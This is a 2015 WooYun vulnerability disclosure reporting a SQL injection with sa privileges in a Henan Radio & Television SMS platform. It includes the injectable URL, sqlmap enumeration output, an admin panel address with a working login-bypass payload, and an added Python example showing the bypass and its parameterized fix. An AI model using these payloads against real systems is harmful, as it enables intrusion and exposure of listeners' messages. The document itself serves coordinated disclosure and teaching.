WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
Disclosure timeline:
2015-07-10: Details sent to the vendor, awaiting vendor handling
2015-07-14: Vendor confirmed; details visible only to the vendor
2015-07-24: Details opened to core white hats and relevant domain experts
2015-08-03: Details opened to regular white hats
2015-08-13: Details opened to intern white hats
2015-08-28: Details opened to the public
Henan Radio & Television: SQL injection with sa privileges (exposes all stations' SMS records and allows changing every station host's password)
Injection point:
1. http://**.**.**/(S(bnpy3yb5u0vxv024i2zr0nze))/ShowAffiche.aspx?Id=16 (the Id parameter; the session token is carried in the path, ASP.NET cookieless-session style)
database management system users privileges:
[*] BUILTIN\\Administrators
[*] sa
[*] sms

available databases [10]:
[*] CePing
[*] MasSMS
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SMS1
[*] SMSInfo
[*] tempdb
current database: 'SMSInfo'
Enumerate the current database:
Database: SMSInfo
[74 tables]
+------------------------------+
| dbo.ActManage                |
| dbo.AfficheInfo              |
| dbo.BY_UserInfo              |
| dbo.BlackListInfo            |
| dbo.CNGP_Receive             |
| dbo.CNGP_Send                |
| dbo.CNGP_Send_H              |
| dbo.DictInfo                 |
| dbo.EventInfo                |
| dbo.Keyword_Sms              |
| dbo.LYBY_UserInfo            |
| dbo.LY_UserInfo              |
| dbo.Lottery_His              |
| dbo.Lottery_Info             |
| dbo.OperInfo                 |
| dbo.OperPurviewInfo          |
| dbo.OperSysPermission        |
| dbo.PhonePostionInfo         |
| dbo.PhoneType_dic            |
| dbo.ReceiveInfo_bak77711_16  |
| dbo.ReceiveInfo_bak77713     |
| dbo.ReceiveInfo_bak77713_16  |
| dbo.ReceiveInfo_bak77713_19  |
| dbo.SGIP_Receive             |
| dbo.SJGB_UserInfo            |
| dbo.SJGB_UserInfo_bak        |
| dbo.SMS_Receive              |
| dbo.SMS_Send                 |
| dbo.SMS_Send_H               |
| dbo.Sms_Content              |
| dbo.UserInfo                 |
| dbo.UserReceiveInfo          |
| dbo.UserReceiveInfo_0819     |
| dbo.UserReceiveInfo_1120     |
| dbo.UserReceiveInfo_1124     |
| dbo.UserReceiveInfo_20121120 |
| dbo.UserReceiveInfo_777      |
| dbo.UserTmp1                 |
| dbo.WXTBY_UserInfo           |
| dbo.WzActInfo                |
| dbo.WzInfo                   |
| dbo.WzSearchUserInfo         |
| dbo.YB_UserInfo              |
| dbo.ceshi                    |
| dbo.cpsp_106262965_56        |
| dbo.cpsp_receive             |
| dbo.cpsp_send                |
| dbo.cpsp_send_bak            |
| dbo.cpsp_send_h              |
| dbo.dtproperties             |
| dbo.pysp                     |
| dbo.pysp_h                   |
| dbo.sgip_106262965_56        |
| dbo.sgip_send                |
| dbo.sgip_send_h              |
| dbo.sjtgb_menu               |
| dbo.sjtgb_user               |
| dbo.sms_106262965_56         |
| dbo.sms_provision            |
| dbo.sms_time                 |
| dbo.svctype_sgip             |
| dbo.sysconstraints           |
| dbo.syssegments              |
| dbo.test                     |
| dbo.tmp_1                    |
| dbo.tmp_2                    |
| dbo.tmp_3                    |
| dbo.tmp_phone                |
| dbo.tmp_phone11              |
| dbo.userReceiveInfo_0414     |
| dbo.userReceiveInfo_Temp     |
| dbo.wmpx                     |
| dbo.wzcx_user                |
| dbo.zypx                     |
+------------------------------+

Database: SMSInfo
Table: dbo.UserReceiveInfo
[9 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| ActId      | int      |
| CreateTime | datetime |
| Id         | int      |
| IsLooked   | int      |
| Phone      | varchar  |
| Port       | varchar  |
| SMSContent | varchar  |
| Status     | int      |
| type       | int      |
+------------+----------+
You can see there are more than 190,000 phone numbers. OK, I'll stop here and not dump the data. No time.
Back-end admin panel:
http://219.156.123.188:8080/(S(bnpy3yb5u0vxv024i2zr0nze))/Login.aspx
Username: admin'or'1'='1    Password: anything
All Henan radio stations
Change a host's password
Click any station, e.g. Henan General Radio
All listeners' SMS messages are visible!
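The login bypass above, as an added example that is not code from the report or from the target site: a login query built by string concatenation, the same query parameterized, and what the report's exact username payload does against each. The injection in ShowAffiche.aspx has the same root cause (input spliced into SQL text); because that connection ran as sa, sqlmap could list every database on the instance rather than just SMSInfo. The table name OperInfo, the column names and the sample rows here are constructed stand-ins, and SQLite is used so the example runs offline; the operator precedence that makes the payload work is the same in T-SQL.

```python
import sqlite3

# Constructed stand-in for the target's login table: the table name, column
# names and rows are assumptions for this example, not taken from the site.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE OperInfo (OperName TEXT NOT NULL, Password TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO OperInfo (OperName, Password) VALUES (?, ?)",
        [("admin", "S3cret!"), ("host_zhang", "hunter2")],
    )
    conn.commit()
    return conn


def vulnerable_sql(username, password):
    """The bug: untrusted input spliced straight into the SQL text."""
    return (
        "SELECT OperName FROM OperInfo WHERE OperName='" + username
        + "' AND Password='" + password + "'"
    )


def login_vulnerable(conn, username, password):
    """Returns the matched account name, or None when login fails."""
    row = conn.execute(vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Fixed form: the driver binds values, so quotes in input stay data."""
    row = conn.execute(
        "SELECT OperName FROM OperInfo WHERE OperName=? AND Password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


PAYLOAD = "admin'or'1'='1"  # the username typed into Login.aspx in the report


def demo():
    conn = make_db()
    return {
        # AND binds tighter than OR, so the WHERE clause becomes
        # OperName='admin' OR ('1'='1' AND Password='anything'): the admin
        # row matches regardless of password.
        "vuln_payload": login_vulnerable(conn, PAYLOAD, "anything"),
        # Same trick with a username that does not exist fails: the OR
        # branch still requires the (wrong) password to match.
        "vuln_unknown_user": login_vulnerable(conn, "nobody'or'1'='1", "anything"),
        # Parameterized: the whole payload is compared as a literal username.
        "safe_payload": login_parameterized(conn, PAYLOAD, "anything"),
        "safe_real_creds": login_parameterized(conn, "admin", "S3cret!"),
    }


if __name__ == "__main__":
    print(vulnerable_sql(PAYLOAD, "anything"))
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The payload works only because an account literally named admin exists: with the precedence shown in the comments it reduces to "OperName='admin' OR (...)", which is why the same suffix on a non-existent username returns nothing. The fix is not escaping quotes but binding parameters, and the application's database login should hold rights on its own database only, not sa, so that an injection cannot reach master or the other SMS databases listed earlier.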
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-07-14 16:04
CNVD confirmed and reproduced the described vulnerability; it has been forwarded via CNCERT to the Henan branch center, which will coordinate remediation with the site's operating unit.
None yet